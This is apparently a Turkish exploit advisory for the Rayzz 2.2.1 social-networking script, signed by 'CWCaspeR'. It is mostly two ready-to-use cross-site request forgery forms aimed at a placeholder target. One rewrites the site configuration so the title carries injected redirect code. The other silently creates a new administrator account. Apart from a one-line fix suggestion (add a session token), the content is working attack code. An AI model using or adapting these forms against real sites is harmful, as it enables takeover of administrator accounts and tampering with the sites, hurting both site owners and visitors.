< ------------------- header data start ------------------- >

#############################################################

# Application Name : Rayzz 2.2.1

# vulnerable Type : XSRF (add code - add admin)

# Infection : Yeni admin eklenebilir ..!

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmelidir !

# Demo : http://demo.agriya.com/rayzz/

# author : CWCaspeR ~ Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

[yönlendirme kodu ekleme]

<form name=form_config id=selFormConfig method=post action=http://hedefsite.com/scriptyolu/admin/editConfig.php autocomplete=off>
<div id=selConfigSection>
<input type=hidden class=clsCheckRadio name=rewrite id=rewrite tabindex=1000 />
<input type=hidden class=clsTextBox name=site_name id=site_name value=Rayzz.net tabindex=1005 />
<input type=hidden class=clsTextBox name=site_title id=site_title value=YONLENDIRME KODU tabindex=1010 />
<input type=hidden class=clsTextBox name=noreply_name id=noreply_name value=Noreply tabindex=1015 />
<input type=hidden class=clsTextBox name=noreply_email id=noreply_email value=[email protected] tabindex=1020 />
<input type=hidden class=clsTextBox name=contactus_email id=contactus_email value=[email protected] tabindex=1025 />
<input type=hidden class=clsTextBox name=index_page id=index_page value=20 tabindex=1030 />
<input type=hidden class=clsTextBox name=keywords id=keywords value=rayzz, rayzz.net, online social networking, video hosting, photo hosting, view, upload and share videos and photos tabindex=1035 />
<input type=hidden class=clsTextBox name=description id=description value=rayzz.net is a free online social networking site that also provides a free video and photo hosting service allowing users to view, upload, and share videos and photos. tabindex=1040 />
<input type=hidden class=clsTextBox name=numpg id=numpg value=16 tabindex=1045 />
<input type=hidden class=clsCheckRadio name=static_page_editor id=static_page_editor tabindex=1050 />
<input type=hidden class=clsCheckRadio name=external_url_open_in_new_window id=external_url_open_in_new_window tabindex=1055 checked />
<input type=hidden class=clsCheckRadio name=allow_all_post_article id=allow_all_post_article tabindex=1060 checked />
<input type=hidden class=clsCheckRadio name=add_default_friend id=add_default_friend tabindex=1065 checked />
<input type=hidden class=clsTextBox name=default_friend_name id=default_friend_name value=webmaster tabindex=1070 />
<input type=hidden class=clsCheckRadio name=signup_auto_activate id=signup_auto_activate tabindex=1075 />
<input type=hidden class=clsCheckRadio name=email_using_to_login id=email_using_to_login tabindex=1080 />
<input type=hidden class=clsCheckRadio name=default_friend_mail id=default_friend_mail tabindex=1085 checked />
<input type=hidden class=clsTextBox name=inactive_users_delete_period id=inactive_users_delete_period value=0 tabindex=1090 />
<input type=hidden class=clsTextBox name=captcha_method id=captcha_method value=honeypot tabindex=1095 />
<input type=submit class=clsSubmitButton name=edit_submit id=edit_submit value=BUTON ADI tabindex=1100 />
</form>

[Yeni admin Ekleme]

<form name=selFormEditProfile id=selFormEditProfile method=post action=http://hedefsite.com/scriptyolu/admin/memberAdd.php?mode=quick autocomplete=on>
<input type=text class=clsTextBox name=user_name id=user_name tabindex=205 value=Kullanici adi />
<input type=text class=clsTextBox name=email id=email tabindex=210 value=e mail />
<input type=text class=clsTextBox name=password id=password tabindex=215 value= Sifre />
<select name=usr_access id=usr_access tabindex=220>
<option value=Admin>Admin</option>
</select>
<input type=text class=clsTextBox name=first_name id=first_name tabindex=225 value=adiniz />
<input type=text class=clsTextBox name=last_name id=last_name tabindex=230 value=soyadiniz />
<select name=sex id=sex tabindex=235>
<option value=male>Male</option>
<option value=female>Female</option>
</select>
<select name=dob_date id=dob_date tabindex=240>
<option value=1 >1</option>
</select>
<select name=dob_month id=dob_month tabindex=245>
<option value=>ay</option>
</select>
<select name=dob_year id=dob_year tabindex=250>
<option value=>1905</option>
</select>
<input type=text class=clsTextBox name=hometown id=hometown tabindex=255 value=websiteniz />
<input type=text class=clsTextBox name=city id=city tabindex=260 value=sehiriniz />
<input type=text class=clsTextBox name=postal_code id=postal_code tabindex=265 value=postakodu />
<select name=country id=country tabindex=270>
<option value= selected=selected>Choose</option>
<option value=TR>Turkey</option>
</select>
<input type=submit class=clsSubmitButton name=editprofile_submit id=editprofile_submit tabindex=275 value=create Member />
</form>

< -- bug code end of -- >